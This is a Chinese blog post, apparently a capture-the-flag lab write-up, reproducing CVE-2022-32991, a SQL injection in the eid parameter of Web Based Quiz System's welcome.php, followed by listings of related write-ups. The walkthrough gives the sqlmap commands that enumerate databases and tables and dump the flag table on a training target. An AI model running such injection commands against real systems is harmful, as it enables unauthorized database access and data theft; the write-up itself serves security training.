CVE-2022-32991漏洞复现

已于 2023-07-10 14:03:07 修改
阅读量1.3k 收藏 2
点赞数 1
文章标签: 安全
于 2023-07-10 14:01:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_78321656/article/details/131637186
版权

靶标介绍:

该CMS的welcome.php中存在SQL注入漏

1.打开靶场,并进行访问

需要进行注册

2.任意注册帐户密码

3.登录成功后寻找注入点,根据靶场提示CMS的welcome.php中存在SQL注入

4.在eid参数后面添加单引号测试,出现报错

6.使用sqlmap工具进行所有数据库爆破。

sqlmap.py -u "http://eci-2zeclzb9xbdphxtltxbx.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -dbs

7.爆出四个库,选择ctf库,加--tables对表进行爆破

 sqlmap.py -u "http://eci-2zeclzb9xbdphxtltxbx.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -D ctf --tables

8.爆出九个表,选择flag表,对字段进行爆破

sqlmap.py -u "http://eci-2zeclzb9xbdphxtltxbx.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -D ctf -T flag --count

9.爆出字段名,加 --dump 对字段值进行爆破,找到flag

sqlmap.py -u "http://eci-2zeclzb9xbdphxtltxbx.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -D ctf -T flag --dump

Admin331
关注
Web Based Quiz System SQL注入漏洞复现CVE-2022-32991
千寻的博客
11-25 1170
`Sourcecodester Web Based Quiz System`是 (`Sourcecodester`)开源的一个应用软件。用于一个简单的在线基础的项目。 `Web Based Quiz System v1.0`版本存在安全漏洞,该漏洞源于通过` welcome.php `中的`eid` 参数发现存在 SQL 注入漏洞。该CMS的welcome.php中存在SQL注入攻击。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-32991 漏洞复现
网安小菜鸡
01-17 1512
CVE-2022-32991 漏洞复现
云镜CVE-2022-32991复现
m0_46684679的博客
02-01 359
云镜CVE-2022-32991SQL注入漏洞复现
春秋云境靶场CVE-2022-32991漏洞复现(sql手工注入)
zyh1588的博客
11-14 1908
小白复现CVE-2022-32991漏洞,该CMS的welcome.php中存在SQL注入攻击......
CVE-2022-32991
qq_63928796的博客
10-11 3202
发现可能存在sql注入漏洞,进而查看一下源码,mysqli_query没有任何的过滤。进去漏洞页面后正常注册登录,发现了p参数和welcome.php界面。该CMS的welcome.php中存在SQL注入攻击。保存成1.txt用sqlmap梭一下。用Seay源码审计一下。
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
**CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时没有进行充分的数据转义,从而导致SQL注入攻击成为可能。具体来说: ...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
春秋云境:CVE-2022-32991
一只爱吃橙子的羊
11-29 1061
Web Based Quiz System SQL注入漏洞CVE-2022-32991
CVE-2022-32991漏洞复现(春秋云镜手工注入sql+自己配置内网环境)
c0529的博客
12-15 673
Web Based Quiz System v1.0版本存在SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。得到了flag,就可以交了,这些过程证明了该漏洞可以利用于查询该数据库的敏感信息,可以利用这些方式得到数据库中用户的账户密码等等。从onder by 1一直尝试到order by 6,只有6报错,发现该表有五个字段。查询数据库中的所有表的名字,利用数据库自带的表,得到了所有的表。用hackbar插件输入(火狐浏览器)看到了flag表,查询表内的列。
【春秋云境】CVE-2022-32991
ZXW_NUDT的博客
02-22 2578
【春秋云境】CVE-2022-32991
【春秋云境】CVE-2022-32991靶场wp
热门推荐
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
春秋云镜.com 免费空间系列(1) CVE-2022-32991
陈学卫的博客
07-27 713
今天看到一个很好的在线靶场平台地址春秋云镜.com,里边有很多的免费的cve漏洞,从今天起,将更新一个春秋云镜免费空间系列,一个一个攻克cve漏洞自此,迈出了攻防小白的第一步。这个主要考用户的sqlmap的一些命令和用法,熟练掌握sqlmap是我们成长的第一步。
cve-2022-41741漏洞复现
08-24
因此,要复现CVE-2022-41741漏洞,首先需要使用受影响的版本(例如nginx-1.23.1及之前的版本),然后使用ngx_http_mp4_module模块进行相关操作,即可复现漏洞。请注意,为了保障系统的安全性,我们强烈建议及时更新...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值